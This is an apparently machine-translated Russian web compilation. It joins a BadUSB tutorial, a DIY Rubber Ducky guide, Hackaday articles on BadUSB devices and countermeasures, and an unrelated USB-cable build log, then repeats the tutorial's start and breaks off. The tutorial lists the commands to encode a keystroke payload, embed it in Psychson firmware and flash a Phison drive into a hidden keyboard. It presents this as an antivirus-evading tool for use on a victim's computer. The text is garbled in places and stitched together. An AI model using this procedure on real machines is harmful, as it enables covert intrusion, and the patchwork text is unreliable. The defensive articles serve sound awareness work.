Перед началом мы хотим убедиться, что наш USB использует поддерживаемый контроллер.Мы можем использовать программу под названием Flash Drive Information Extractor для сбора необходимой информации о нашем USB.

Не требует установки. Просто откройте инструмент и нажмите кнопку «Получить информацию о USB-накопителе», когда USB-накопитель вставлен в компьютер. Если ваш накопитель использует контроллер Phison 2303 (2251-03), вывод должен выглядеть примерно так:

Однако, если ваше USB-устройство имеет другое устройство, скорее всего, вы не сможете перепрограммировать его на HID-устройство с этим эксплуатировать.Обязательно проверьте известные поддерживаемые устройства, чтобы выбрать одно из них, которое будет работать.

Настройка среды сборки

Разработчик кода рекомендует нам использовать любую версию Microsoft Visual Studio 2012 или выше для компиляции инструментов и SDCC для создания собственной прошивки. Загрузка Visual Studio, вероятно, займет несколько часов, и ее нельзя будет приостановить, поэтому убедитесь, что у вас достаточно времени. Он также требует несколько гигабайт на вашем основном диске, около 10 ГБ на моем SSD, что раздражает.

Загрузка и компиляция исходного кода

Чтобы изменить наш поддерживаемый USB-накопитель, нам необходимо создать инструменты, которые с ним взаимодействуют. Исходный код опубликован на GitHub Адамом Кодиллом . На самом деле Visual Studio поставляется с изящной функцией, которая позволяет нам клонировать весь репозиторий. Вы даже можете взаимодействовать с VS с сайта GitHub:

После клонирования и открытия репозитория. Скорее всего, вы увидите три решения.

  • DriveCom
  • EmbedPayload
  • Инжектор

Нам понадобятся только DriveCom и EmbedPayload.Если он открыт, вы можете скомпилировать с помощью Ctrl + Shift + B или Строка меню — Сборка — Сборка решения .

Если вы не можете клонировать репозиторий через Visual Studio, загрузите файл .zip с GitHub и откройте файлы .sln в каждой папке решений. DriveCom и EmbedPayload теперь должны находиться в каталоге … \ Psychson \ tools : E: \ Documents \ Bad_USB \ Psychson \ tools .

Получение образа записывающего устройства

«Образ записывающего устройства» требуется для создания дампа и прошивки микропрограмм на вашем приводе.Обычно они называются с использованием соглашения «BNxxVyyyz.BIN». Образы устройств записи для контроллеров Phison можно найти здесь . Несмотря на то, что сайт доступен только на русском языке, вы найдете ссылку для загрузки, если просканируете сайт на наличие «BN03». BN подразумевает образ горелки, а 03 соответствует PS2251-03. Я извлек файлы в E: \ Documents \ BadUSB \ Burner_Image \ .

Каждый образ записывающего устройства должен выполнять свою работу, но вы можете использовать самую новую версию, которая обозначена частью имени «Vyyy».

Dowload Duck Encoder

«Duck Encoder» — это кроссплатформенный инструмент на основе Java, который преобразует сценарии в полезные данные HID. Он основан на Bad-USB под названием «Rubber Ducky» от Hak5. Вы можете скачать здесь . (Не забудьте установить Java.) Я сохранил его в папке E: \ Documents \ Bad_USB \ DuckEncoder \ .

Создание пользовательского микропрограммного обеспечения

На этом этапе все наши приготовления завершены, и мы можем продолжить использование инструментов. На этом этапе нам просто нужно перейти к нашему … \ Psychson \ firmware \ и запустите build.bat . Если все пойдет правильно, вы увидите новую папку с множеством разных файлов внутри.

Файл fw.bin — это файл, который мы будем использовать в следующих полезных данных.

Написание сценария

Вы можете спросить себя, на каком языке мы будем писать наш сценарий. Поскольку Duck Encoder основан на «Rubber Ducky», мы будем использовать «Duckyscript» в качестве языка. Синтаксис довольно простой. Более подробные инструкции можно найти здесь.

Мы продолжим и создадим файл .txt в нашем предпочтительном каталоге

( E: \ Documents \ Bad_USB \ DuckEncoder \ script.txt ). Я подумал показать вам что-то более интересное, чем сценарий «Hello World», поэтому я сделал этот:

Как вы можете предположить, Bad USB «нажмет» Windows + R и заставит окна немедленно закрыться с этим сценарий. Кроме того, вы можете ясно видеть, что я написал «/» вместо «-». Это потому, что наша «клавиатура» (Bad USB) имеет U.В моей стране макет S. и Windows установлен на DEU. Имейте в виду, что мы должны изменить макет Windows на США и написать сценарий, как обычно, или так, как его напишет компьютер вашей жертвы. Не путайте ввод.

Здесь вы даже можете использовать собственные сценарии и провести обратный инжиниринг.

Преобразование в HID полезную нагрузку

Пора начать использовать терминал Windows — cmd.

java -jar «ПУТЬ к \ duckencode.jar» -i «ПУТЬ к \ скрипту.txt «-o» \ payload.bin Путь «

Пример:

java -jar E: \ Documents \ BadUSB \ DuckEncoder \ duckencode.jar -i E: \ Documents \ Bad_USB \ DuckEncoder \ script.txt -o E: \ Documents \ Bad_USB \ DuckEncoder \ inject.bin

Мы не получим никакого вывода, но в моем случае inject.bin должен быть создан в E: \ Documents \ Bad_USB \ DuckEncoder \ .

Embed Полезная нагрузка в прошивке

Теперь нам нужно использовать инструменты, которые мы создали с помощью Visual Studio.Очевидно, что EmbedPayload предназначен для встраивания полезных данных.Нам просто нужно выполнить его в cmd:

«Путь к EmbedPayload.exe» «ПУТЬ к полезной нагрузке» «ПУТЬ к встроенному ПО, которое мы создали»

Для меня это:

E: \ Documents \ BadUSB \ Psychson \ tools \ EmbedPayload.exe E: \ Documents \ Bad_USB \ DuckEncoder \ inject.bin E: \ Documents \ Bad_USB \ Psychson \ firmware \ bin \ fw.bin

Обратите внимание, что теперь файл fw.bin включает полезную нагрузку. Вы также можете перезаписать прошивку, повторно запустив build.bat.

Дамп текущей прошивки USB-накопителя

Я настоятельно рекомендую вам сделать копию текущей прошивки на USB-накопитель на случай, если вы захотите восстановить ее.Для любого действия, которое мы хотим предпринять с нашим USB-накопителем, мы должны использовать DriveCom, который находится в нашей папке «tools».

«ПУТЬ к DriveCom.exe» / drive = «Буква диска нашего USB» / action = DumpFirmware / burner = «ПУТЬ к нашему образу записывающего устройства» / firmware = «ПУТЬ к output.bin»

В моем экземпляр:

E: \ Documents \ Bad_USB \ Psychson-master \ tools \ DriveCom.exe / drive = F / action = DumpFirmware /burner=E:\Documents\Bad_USB\Firmware\BN03V117M.BIN / firmware = E: \ Документы \ Bad_USB \ originalfw.bin

Прошивка прошивки

Наконец, мы можем передать очень злонамеренную полезную нагрузку выключения, встроенную в прошивку, на наш USB-накопитель:

«ПУТЬ к DriveCom.exe» / drive = «Буква диска» / действие = SendFirmware / burner = «ПУТЬ к образу записывающего устройства» / firmware = «ПУТЬ к прошивке»

В моем случае:

E: \ Documents \ BadUSB \ Psychson \ tools \ DriveCom.exe / drive = F / действие = Отправить прошивку / записывающее устройство = E: \ Documents \ Bad_USB \ Firmware \ BN03V117M.BIN /firmware=E:\Documents\Bad_USB\Psychson\firmware\bin\fw.bin

Успешный вывод должен выглядеть следующим образом:

Обратите внимание, что DriveCom автоматически переключает режим нашего USB-накопителя в режим загрузки, чтобы прошить прошивка. Теперь, когда наш USB-накопитель превратился в клавиатуру, мы больше не можем переключать режимы с помощью наших инструментов или доступа к памяти, но это небольшая проблема. В следующем разделе я сосредоточусь на том, как решить эту проблему.

Установка нашего устройства в «режим загрузки» вручную

Если вы хотите предпринять дальнейшие действия с вашим неисправным USB-накопителем, вы заметите, что ни DriveCom, ни Windows, ни любая другая операционная система не могут получить к нему доступ, потому что это, в конце концов, клавиатура.Нам нужно открыть корпус нашего USB-накопителя и подключить два контакта микроконтроллера, подключив накопитель к нашему ПК. Поскольку круг находится в верхнем левом углу моего контроллера (с этой точки зрения), мне нужно соединить два контакта с левой нижней стороны:

Возможно, вам потребуется открыть изображение в новой вкладке и увеличить масштаб.

Я обычно используйте край USB-разъема для соединения этих двух контактов. Кроме того, в этом случае может быть очень полезен удлинительный кабель USB. Вроде сложно, но к этому привыкнешь.Используйте то, что вам удобнее, не повредив USB-накопитель. Если вы сделаете это правильно, диск снова появится в Windows:

И мы можем изменить наш диск или снова прошить исходную прошивку. В противном случае ваш компьютер выключится — в следующий раз постарайтесь больше .

Примечания

  • Плохой USB-порт может не работать на всех ПК с Windows, включая мой, так как он может быть некомпетентным при загрузке драйверов. Вы можете попробовать добавить задержку в начале скрипта (спасибо Seytonic)
  • Имейте в виду, что вы не сможете получить доступ к памяти, пока ваш USB-накопитель имитирует HID-устройство.

Последние мысли

Плохой USB — очень мощный инструмент, если у вас есть доступ к компьютеру жертвы, даже если Windows может не справиться с загрузкой драйверов USB. Кроме того, он избегает обнаружения антивирусов, поскольку это клавиатура, а не вирус.

Кроме того, я хотел бы отметить, что очень ценю конструктивные отзывы от вас, ребята. Так что не стесняйтесь писать мне в личку, если найдете какую-либо ошибку или хотите, чтобы я что-то улучшил!

Список литературы

Все фотографии были сделаны мной.

Хотите начать зарабатывать деньги как хакер в белой шляпе? Начните свою хакерскую карьеру с помощью нашего пакета обучения Premium Ethical Hacking Certification Bundle 2020 в новом магазине Null Byte и получите более 60 часов обучения от профессионалов в области кибербезопасности.

Купить сейчас (90% скидка)>

Другие выгодные предложения, которые стоит проверить:

DIY USB Rubber Ducky. Изготовление самодельной резиновой уточки из… | by HaXeZ — Упрощенная кибербезопасность | Geek Culture

Резиновый утенок, впервые концептуализированный и популяризированный Дарреном Китчен из hak5, представляет собой эмулятор USB-клавиатуры.Это дает владельцу этого устройства неограниченную власть, по крайней мере, в компьютерных системах. Эмулятор вводит нажатия клавиш в машину жертвы с беспрецедентной скоростью и точностью. Правильная комбинация клавиш сделает отличные, но невероятные вещи.

Резиновая уточка USB https://shop.hak5.org/products/usb-rubber-ducky-deluxe в настоящее время продается за 49,99 доллара, что является разумной ценой, и я настоятельно рекомендую приобрести ее для поддержки Hak5. Однако, если по какой-то причине вы не можете получить ее, возьмите виртуальную клавиатуру CJMCU.Вам также понадобится карта micro SD, устройство чтения карт памяти micro SD, резиновая уточка и кофе.

Установка интегрированной среды разработки Arduino

После того, как вы выпили кофе и свой CJMCU, вам нужно будет загрузить и установить интегрированную среду разработки Arduino. Его можно загрузить из Microsoft Store, если вы используете Windows, или вы можете получить его с их веб-сайта, если вы используете Linux. https://www.arduino.cc/en/guide/linux

Затем вам нужно будет получить Duckduino из репозитория Seytonic на github.

https://github.com/Seytonic/Duckduino-microSD/blob/master/Duckduino-microSD/Duckduino-microSD.ino

Загрузка скрипта .ino

Следующее, что нужно сделать, это вставить CJMCU в порт USB и запустите Arduino IDE. Прежде чем двигаться дальше, вам может потребоваться проверить правильность выбора платы и COM-порта. Оба они могут быть настроены из меню инструментов. Так как плата CJMCU является клоном платы Leonardo, это та плата, которую я выбрал в меню досок.

Затем вам нужно будет скопировать содержимое файла Duckduino-microSD.ino в скетч Arduino. Затем используйте кнопку загрузки, чтобы отправить новый эскиз на плату CJMCU. Это функция, которая позволяет CJMCU имитировать клавиатуру. Это то, что позволяет ему работать как USB Rubber Ducky, которого мы все знаем и любим. Через некоторое время загрузка завершится, и устройство почти готово к работе. Не хватает только полезной нагрузки.

Загрузка полезной нагрузки

В репозитории git hub https: // github есть огромное хранилище полезных данных ducky.com / hak5darren / USB-Rubber-Ducky / wiki / Payloads. Найдите нужную полезную нагрузку, я предлагаю начать с чего-нибудь простого, например, с открытой веб-страницы, полезной нагрузки любой платформы. Скопируйте содержимое сценария в текстовый файл и внесите изменения, чтобы настроить его по своему вкусу (могу я предложить https://www.youtube.com/watch?v=oHg5SJYRHA0). Сохраните его как script.txt или что-то еще, что вы установили String DEFAULT_FILE_NAME = «script.txt»; значение в ino-файле, загруженном в CJMCU. Наконец, скопируйте файл script.txt на свой MicroSD с помощью устройства чтения карт MicroSD.Теперь ваша подделка USB Rubber Ducky готова разыграть ничего не подозревающих жертв.

Хотя USB Rubber Ducky в первую очередь ассоциируется со взломом и тестированием на проникновение, это мощный инструмент автоматизации, который можно использовать для широкого круга утомительных задач. Например, представьте, что вам нужно установить программное обеспечение или внести изменения в конфигурацию на нескольких машинах с воздушным зазором. Вы можете написать сценарий, который автоматизирует этот процесс за вас.

Hihey TF MicroSD Слот для карты Micro SD Badusb USB Виртуальная клавиатура ATMEGA32U4 Модуль для Leonardo R3 Bad USB

https: // www.amazon.co.uk/gp/product/B07S7VYGDC/ref=ppx_yo_dt_b_asin_title_o01_s00?ie=UTF8&psc=1

Подробнее на haXez

Badusb | Hackaday

Вокруг Хэллоуина уже давно ведется много скандалистов из-за того, что булавки, иглы и бритвенные лезвия будут спрятаны в конфетах и ​​переданы детям. В очень редких случаях, когда это случается, результат обычно немного больше, чем несколько поверхностных порезов. Однако на 2019 год [MG] разработала совершенно другую скрытую полезную нагрузку, которая будет доставлена ​​трюкам или специалистам по обработке.

Состоящий из небольшого USB-устройства под названием DemonSeed, это устройство HID-атаки в жанре устройств BadUSB, которые мы видели ранее. При подключении устройство имитирует клавиатуру USB и может быть запрограммировано на ввод любых нажатий клавиш, необходимых для захвата управления машиной или эксфильтрации данных. Файлы доступны на Github для тех, кто хочет воспроизвести устройство.

Дело в доставке. [MG] произвела большое количество этих небольших устройств, упаковав их в антистатические обертки.Обертки содержат записку, в которой детям предлагается вставить их в рабочие компьютеры родителей, чтобы получить доступ к «игровым кодам» и поделиться ими со своими друзьями, скрывая их от взрослых.

Идеи о том, что дети нагло подключают враждебные USB-устройства к важным компьютерам, достаточно, чтобы вскружить голову любому ИТ-менеджеру, хотя мы подозреваем, что [MG] на самом деле не намерен использовать эти устройства в гневе. Однако это служит отличным предупреждением о потенциальной опасности такой атаки. Будьте начеку и держите дверь своего офиса на замок 31 октября!

Если раньше вас не пугали USB-кабели, то теперь стоит им стать.Кабель O.MG (или комплект Offensive MG) от [MG] скрывает черный ход внутри корпуса USB-разъема. Подключите этот кабель к компьютеру, и вы станете жертвой удаленных атак через Wi-Fi.

Вы можете спросить, что находится внутри этого крошечного USB-кабеля, чтобы сделать его уязвимым для таких атак. В этом весь трюк: внутри корпуса USB-разъема «A» находится печатная плата, на которую загружен микроконтроллер WiFi (в документации не указано, какой именно), который будет отправлять полезные данные через USB-устройство. Думайте об этом как об устройстве BadUSB, таком как USB Rubber Ducky от Hak5, но с которым вы можете управлять удаленно.Это лучший способ войти в систему, и все, что нужно сделать, — это подключить к компьютеру случайный USB-кабель.

В те годы, когда в мир был распространен BadUSB — эксплойт, спрятанный в самом USB-контроллере устройства, [MG] неустанно работал над созданием своего собственного вредоносного USB-устройства, и теперь оно, наконец, готово. Кабель O.MG скрывает лазейку внутри стандартного стандартного USB-кабеля.

Конструкция этого устройства впечатляет: оно полностью помещается в разъем USB.Но это не просто печатная плата из случайного китайского производителя печатных плат: [MG] потратил 300 часов и 4000 долларов за последний месяц на реализацию этого проекта вместе с фабрикой Bantam и создал свои собственные печатные платы с шелкографией. Это впечатляет, как ни крути.

Будущие обновления этого кабеля, которые взломают любой компьютер, могут включать в себя порт ESPloitV2, эмулятора USB HID-клавиатуры с открытым исходным кодом, управляемого Wi-Fi. Это придаст большую мощность этому устройству, которое и без того обладает огромными возможностями. На видео, прикрепленном к этому твиту, вы можете увидеть О.Кабель MG подключен к MacBook, при этом [MG] открывает веб-страницу удаленно.

В прошлом месяце в Сингапуре прошел саммит лидеров Северной Кореи и США. Аккредитованным журналистам, приглашенным на мероприятие, был вручен комплект для прессы, содержащий бутылку воды, различные бумажные изделия и вентилятор, который подключается к USB-порту.

Понятно, что люди, занимающиеся компьютерной безопасностью в Твиттере, очень посмеялись. Не следует подключать случайные USB-устройства к компьютеру, особенно если вы журналист, особенно если вы находитесь в другой стране, и особенно если вы освещаете самый престижный международный саммит за последнее время.Это безрассудно.

Это не история про USB-вентилятор, его демонтаж или шпионские агентства по всему миру, взламывающие компьютеры журналистов. Это история о необходимости более высокого уровня осведомленности о том, что мы подключаем к нашим компьютерам. В этом случае ничего не вышло — большинство USB-устройств только таковые и не более того. Один из вентиляторов недавно был снесен (PDF), и линии передачи данных даже не подключены. (Я расскажу об этом позже в этой статье). Но этот анекдот дает возможность поговорить о безопасности USB и о том, как принуждение к подключению каждого USB-устройства к компьютеру должно быть прервано на несколько секунд задумчивости.

Читать далее «Разборка USB-вентилятора свидетельствует об отсутствии у журналистов опсеков» →

Некоторое время назад я написал статью о Malduino, устройстве BadUSB с открытым исходным кодом на базе Arduino. Проект показался мне интересным, поэтому я подписался на элитную версию, и, конечно же, дружелюбный почтальон отправил ее мне в почтовый ящик в прошлую пятницу, а это значит, что мне нужно поиграться с ней на выходных. Для тех, кто пропустил статью, Malduino — это USB-устройство, которое, помимо прочего, способно имитировать клавиатуру и вводить нажатия клавиш.В надлежащем корпусе он будет выглядеть как флешка. Это похоже на то, что вы видите в фильмах, где парень подключает устройство, а оно автоматически взламывает компьютер. Он поставляется в двух версиях, Lite и Elite, обе основаны на ATmega32U4.

Версия Lite действительно мала, помимо USB-разъема в ней есть только переключатель, который позволяет пользователю выбирать между режимом работы и режимом программирования, и светодиод, который показывает, когда сценарий завершился.

Оригинальный эскиз Malduino Elite и прототип Lite

Версия Elite больше по размеру, поставляется с кард-ридером Micro-SD и четырьмя DIP-переключателями, которые позволяют пользователю выбирать, какой сценарий запускать с карты.Он также имеет светодиод, который показывает, когда сценарий завершил работу. Это позволяет пользователю записать прошивку только один раз, а затем запрограммировать сценарии ввода нажатия клавиш, которые хранятся на карте Micro-SD, в отличие от версии Lite, которую необходимо обновлять каждый раз, когда пользователь хочет запустить другой сценарий.

Это два Malduinos, и поскольку они программируются прямо из Arduino IDE, каждую функцию, которую я только что упомянул, можно перепрограммировать, переназначить или удалить все вместе.Вы можете купить один и просто использовать его как «нормальный» Arduino, хотя здесь не так много контактов, с которыми можно было бы поиграть. Эта свобода была одной из первых вещей, которые мне в ней понравились, и фактически подтолкнула меня к участию в кампании краудфандинга. Читайте полный обзор.
Читать далее «Malduino Elite — Первые впечатления» →

Если вам когда-либо был нужен пример того, почему вы не должны подключать случайные периферийные USB-устройства к компьютеру, вам нужно только взглянуть на BadUSB.Атака BadUSB основана на том факте, что микроконтроллер внутри каждого USB-устройства представляет собой черный ящик. Если вы подключите флэш-накопитель USB к компьютеру, микроконтроллер сможет быстро настроить дополнительный сетевой интерфейс, перенаправить весь ваш трафик на сервер злоумышленника и по-прежнему обслуживать все эти файлы и документы на диске. Вы хотите флэш-накопитель, который прикрепляет вирус к каждому файлу? Плохой USB может это сделать.

До сих пор не существует лекарства или исправления для устройства, использующего реализацию BadUSB.[Роберт Фиск] только что придумал первое профилактическое USB-устройство, предназначенное для защиты вашего компьютера от BadUSB. Он называет это USG, и это, по сути, аппаратный брандмауэр для USB-устройств.

Базовая конструкция системы выглядит примерно так: возьмите микроконтроллер ARM с хост-портом USB, возьмите другой микроконтроллер с портом USB-устройства и пусть эти устройства взаимодействуют друг с другом через SPI. Командный протокол между этими двумя микроконтроллерами очень прост, что снижает вероятность атаки.

[Роберт] создает ключи USG, но в духе открытого оборудования и проверяемого оборудования он также выпустил проект, основанный на двух платах разработки, соединенных вместе. Эта версия «сделай сам» представляет собой в основном две платы разработчика STM32F4, разбитые вместе проводами. Общая стоимость (без припоя и JTAG-программатора) составляет около 50 долларов. Нет, это не так красиво, как коммерческая версия USG [Роберта], но она выполняет ту же работу по защите вашего компьютера от устройств BadUSB.

Однажды утром к вам в офис заходит хакер в балаклаве.Вы предполагаете, что это коллега, потому что на нем балаклава. Хакер вставляет USB-накопитель в компьютер в кубе по соседству. На экране появляются странные инструменты командной строки. Через несколько минут вся ваша компания окажется под угрозой. Мошенник быстро отступает, неся в руке флешку.

Это сценарий, представленный поставщиками балаклав и USB Rubber Duckys, крошечных USB-устройств, способных вводить код, запускать программы и извлекать данные из любой системы. Лучший и самый распространенный способ предотвратить подобные атаки — это заполнить USB-порты эпоксидной смолой.[pmsosa] подумал, что должен быть программный метод защиты от этих резиновых уток, поэтому он создал Duckhunter, небольшого эффективного демона, который может ловить и предотвращать эти эксплойты.

Атака Rubber Ducky просто открывает командную строку и извергает атаку с эмулированной USB HID-клавиатуры. Если злоумышленник не может открыть cmd или PowerShell, атака прекращается. Это достаточно просто для программирования, но у [pmsosa] есть еще несколько уловок в рукаве. У Duckhunter есть «скрытая» функция противодействия, при которой блокируется одно из каждых 5-7 нажатий клавиш.Атакующему кажется, что «скрытая» контрмера выглядит так, как будто атака сработала, хотя на самом деле она провалилась.

Есть несколько различных атак, похожих на то, что может выполнять Rubber Ducky. Mousejack выполняет ту же атаку через Bluetooth. BadUSB является немного более техническим, позволяя любому, у кого есть доступ к прошивке устройства, настроить вашу клавиатуру против вас. Из-за характера атаки Duckhunter отключает их всех.

Прямо сейчас сборка предназначена только для Windows, но, согласно GitHub [pmsosa], скоро появятся версии для Linux и OS X.

USB в настоящее время стал довольно «универсальным», обрабатывая все, от высокоскоростной передачи данных до зарядки телефонов. Есть даже лавовые лампы с питанием от USB. Однако такая повсеместность не обходится без некоторых затрат. Было совершено множество атак на смартфоны и компьютеры, которые использовали тот факт, что USB можно найти практически повсюду, и если вы хотите избежать этих атак, вы можете либо отказаться от использования USB, либо сделать то, что сделал [Джейсон], и заблокировать линии данных на Порт USB.

USB обычно использует четыре провода: два для питания и два для данных. Однако если вы просто отключите линии передачи данных, периферийное устройство не сможет согласовать с хостом дополнительную мощность и будет терять 0,5 Вт. Однако [Джейсон] обнаружил, что это согласование происходит на гораздо более низкой скорости передачи данных, чем обычная передача данных, и смог установить тип фильтра между хостом и периферийным устройством. Фильтр позволяет проходить низкочастотной передаче данных, но когда происходит высокочастотная передача данных, фильтр блокирует связь.

[Джейсон] теперь имеет устройство, которое позволяет его периферийным устройствам заряжаться с повышенной скоростью, не беспокоясь о ненадежных портах USB (например, в аэропорту или кафе). Это простое устройство может помешать таким вещам, как BadUSB, выполнять свою грязную работу, хотя вопрос о том, сможет ли оно остановить что-то настолько неприятное, все еще остается открытым.

Нужен USB-кабель? Построй! — Йозеф Адамчик

Когда у вас есть настраиваемая клавиатура с красивыми колпачками и футляром, вы можете подумать, что мне настроить дальше? Начнем с кабеля, который соединяет мою клавиатуру с компьютером!

Честно говоря, я далек от оригинала с этой идеей.Есть сервисы, где можно заказать такой кабель, их уже давно строят другие. Если вы прокрутите тему Reddit о механических клавиатурах, вы увидите их повсюду. Я также уже сделал один простой пользовательский USB-кабель, который вы можете найти в конце сообщения о моей пользовательской клавиатуре.

Но так как я люблю делать вещи, я захотел сделать еще одну. В процессе я сделал несколько фотографий, чтобы создать небольшой журнал сборки. Как обычно в моем случае, это не пошаговое руководство, а небольшое представление о творчестве и вдохновение для дорогого читателя.

Материал

Я включил ссылки на Алиэкспресс. Большинство из них — вещи, которые я действительно купил. Это не партнерские ссылки. Это пример того, что вы могли бы купить, если бы захотели сделать такой же кабель.

  • 4-х проводный кабель (Алиэкспресс). Вы также можете купить экранированный, если хотите. Следите за изоляцией, если вы хотите намотать кабель позже — он, скорее всего, не подойдет для силикона (поскольку он термостойкий), поэтому выберите старый добрый ПВХ. Вы также можете утилизировать старые USB-кабели.
  • кусок паракорда для оплетки (Алиэкспресс)
  • Трубка термоусадочная
  • Разъемы USB. В моем случае USB-Mini и USB-A, но вы также можете купить USB-Micro и USB-C.
  • GX12 или GX16 4-х контактный авиационный разъем (Алиэкспресс) для украшения.
  • Паяльник и немного припоя.
  • Пруток для бухты (шахта диаметром 10 мм)
  • Тепловая пушка (у меня есть только дешевая, сделанная своими руками), некоторые вместо нее используют фен.

Обновление: качество и спецификация USB

Поскольку статья была размещена на hackaday.com и размещена в hackernews, я чувствую необходимость уточнить некоторые вещи.

Этот кабель не является высококачественным USB-кабелем. Как отмечали многие в комментариях на hackaday.com и hackernews, это довольно плохой USB-кабель.

  • Кабель неэкранированный.
  • Авиационный разъем не работает, и его не должно быть на кабеле. Это повлияет на качество и может вызвать несколько проблем.

Я бы не стал использовать такой кабель ни для высокоскоростной связи USB, ни для сильноточной зарядки других устройств. Я использую его для своей клавиатуры USB 2 (на базе Atmega32u4) ежедневно, и он работает хорошо. Если вам действительно нужен высококачественный кабель, купите его, не делайте его или, по крайней мере, не так, как я — используйте экранированный кабель, не используйте разъем Aviation и прочтите спецификацию. Вы также можете пойти и прочитать обсуждения под статьями выше, некоторые люди на самом деле делятся некоторой информацией, а не только язвительным «Я-единственный-умный-вот-а-вы-все-глупые» примечания.

Журнал сборки

Кабель, паракорд. Первым делом необходимо отмерить и отрезать обе части желаемой длины. Мне нужна была катушка, поэтому я намотал кусок кабеля на свой деревянный стержень, чтобы измерить, сколько мне нужно для катушки, которая мне нравится. Как только паракорд будет разрезан, выньте белые нити изнутри и обожгите концы паракорда с помощью Более короткий отрезок кабеля (между USB-mini и авиационным разъемом) уже соединен в рукавах с кусками разъемов и термоусадочными элементами.Надеть оплетку легко, достаточно протянуть кабель через паракорд. Я закрепил его на концах каплей суперклея. Более длинный кусок кабеля и его разъемы. Более длинный кусок кабеля сложнее надеть. Не торопитесь. Лужить провода. Первая часть авиационного разъема припаяна и покрыта термоусадкой. И прикрыта своей оболочкой. Припаиваем USB-mini разъем. Поскольку это второй разъем на отрезке кабеля, убедитесь, что термоусадочный элемент уже установлен на кабеле, прежде чем приступить к выполнению этого шага.Паял. Я немного боялся, что один из проводов при натяжении может коснуться другого. Поэтому я имплантировал кусок ленты и позже добавил немного горячего клея. Наложена небольшая термоусадка и разъем готов. Добавлена ​​вторая термоусадочная пленка, покрывающая разъем, и, таким образом, первый кусок кабеля завершен. Давайте начнем с другой части. .Приготовьте записи с информацией, какой провод подключается к какой контактной площадке разъема всегда на виду. Контактные площадки на авиационных разъемах пронумерованы, контактные площадки на USB-разъемах описаны в даташите или в Интернете.Провода в кабеле имеют цветовую маркировку. Дважды проверьте все. Я был очень осторожен и все же хоть раз напортачил (но вскоре заметил). Это вторая половина авиационного разъема сделана. USB-A, опять же, не забудьте наложить внутреннюю термоусадочную пленку на кабель. . Запаян с термоусадочной изоляцией. USB-A заключен и покрыт другой термоусадочной пленкой. Кабель в комплекте и должен работать. У меня не в первый раз, скорее всего что то напортачил при вкручивании авиационного разъема. Когда я начал его разбирать, то опять напортачил и случайно начал откручивать не ту часть разъема и скручивать провода.В итоге я переделал обе половинки авиационных разъемов. Это фото после того, как я все починил. Я был слишком раздосадован и не задокументировал свой провал, так что кабель работает, давайте его свернем. Я сделал красивую тугую спираль вокруг своей удочки. Я использовал малярный скотч, чтобы удерживать его на месте. Имейте в виду, что тепло не подходит для лент и используемого на них клея. Но вы хотите, чтобы ваша катушка была как можно более плотной после того, как вы ее нагреете. Я использовал свою тепловую пушку, чтобы нагреть катушку — скажем, 5-10 минут, осторожно нагревая катушку, убедившись, что все места горячие.Затем я дал ему остыть и повторил 3 или 4 раза. Если лента ослабла, подождите, пока она остынет, разорвите ее и снова затяните катушку. Результат неплохой, но не идеальный. И последний снимок всего кабеля. С Katana60 они хорошо подходят, не так ли?

Как сделать свою собственную USB Rubber Ducky, используя обычный USB?

Вы когда-нибудь задумывались, чтобы сделать свой собственный Rubber Ducky ? Я не хочу соревноваться с Hakshop. Во-первых, если вы хотите приобрести у них оригинальный USB Rubber Ducky, он действительно упрощает работу с более быстрыми программами.Было бы лучше и быстрее выполнять или записывать полезные данные.

Тем не менее, если вы хотите сделать свою собственную резиновую уточку USB?

  • Windows (Операционная система)
  • Флэш-накопитель USB 3.0

Поддерживаемые флэш-накопители:

  • Patriot 8GB Supersonic Xpress * (почти все сейчас 2307 на Amazon [куплено 9 у всех 9 продавцов])
  • Kingston DataTraveler 3.0 T111 8 ГБ
  • Silicon Power Marvel M60 64 ГБ
  • Patriot Stellar 64 Гб Phison
  • Toshiba TransMemory-MX USB 3.0 16 ГБ (может поставляться с 2307)
  • Toshiba TransMemory-MX USB 3.0 8 ГБ (может поставляться с 2307)
  • Kingston DataTraveler G4 64 ГБ
  • Патриот
  • PSF16GXPUSB Supersonic Xpress 16GB
  • Silicon Power 32 ГБ Blaze B30 (SP032GBUF3B30V1K)
  • Kingston Digital 8GB USB 3.0 DataTraveler (DT100G3 / 8GB) * — Использование PS2251-03 (кстати, DriveCom.exe для него не работает, вам нужно использовать Phison MPALL Tools для записи прошивки.)
  • Verbatim STORE N GO 32 ГБ USB 3.0
  • Verbatim STORE N GO V3 8 ГБ USB 3.0 (может поставляться с 2307)

Определение микроконтроллера нашего USB-накопителя:

Перед тем, как начать, мы должны убедиться, что наш USB использует поддерживаемый контроллер. Мы можем использовать программу под названием Flash Drive Information Extractor для сбора необходимых данных о нашем USB.

Просто откройте инструмент и нажмите кнопку «Получить информацию о флэш-накопителе USB», когда USB-накопитель встроен в ваш компьютер.Если на вашем диске используется контроллер Phison 2303 (2251-03), выход должен выглядеть следующим образом:

В любом случае, если у вашего USB-гаджета есть альтернативный, вы, несомненно, не сможете превратить его в HID-гаджет с этим приключением. Обязательно проверьте известные усиленные гаджеты, чтобы выбрать тот, который будет работать.

Принимая во внимание конечную цель по замене используемого USB-накопителя, мы должны производить устройства, которые взаимодействуют с ним.Исходный код распространяется на GitHub Адамом Кодиллом. Действительно, Visual Studio сопровождает безупречный компонент, который дает нам возможность клонировать весь архив. Вы даже можете подключиться к VS с сайта GitHub:

После клонирования и открытия репозитория. Скорее всего, вы увидите три решения.

  • DriveCom
  • Добавить код
  • Инжектор

Нам понадобятся только DriveCom и EmbedPayload. Если он открыт, вы можете скомпилировать с помощью Ctrl + Shift + B или Строка меню — Сборка — Сборка решения .

Если вы не можете клонировать репозиторий через Visual Studio, загрузите файл .zip с GitHub и откройте файлы .sln в каждой папке решений. DriveCom и EmbedPayload теперь должны находиться в каталоге … \ Psychson \ tools : E: \ Documents \ Bad_USB \ Psychson \ tools .

Образ горелки

Образ записывающего устройства необходим для создания дампа и прошивки микропрограмм на вашем накопителе. Обычно они называются с использованием соглашения «BNxxVyyyz.BIN».Образы устройств записи для контроллеров Phison можно найти здесь . Несмотря на то, что сайт доступен только на русском языке, вы найдете ссылку для загрузки, если просканируете сайт на наличие «BN03». BN подразумевает образ горелки, а 03 соответствует PS2251-03. Я извлек файлы в E: \ Documents \ BadUSB \ Burner_Image \ .

Каждый образ записывающего устройства должен выполнять свою работу, но вы можете использовать самую новую версию, которая обозначена частью имени «Vyyy».

Загрузить Duck Encoder

